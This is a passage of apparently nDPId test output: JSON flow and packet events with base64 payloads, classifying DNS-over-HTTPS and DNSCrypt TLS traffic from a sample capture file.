cL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/IDh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMhaAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyRJffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R06OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3Cr0\/J9vWUZrGJZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/Dcco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3jFhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDGKyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5euuv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"thread_ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01mu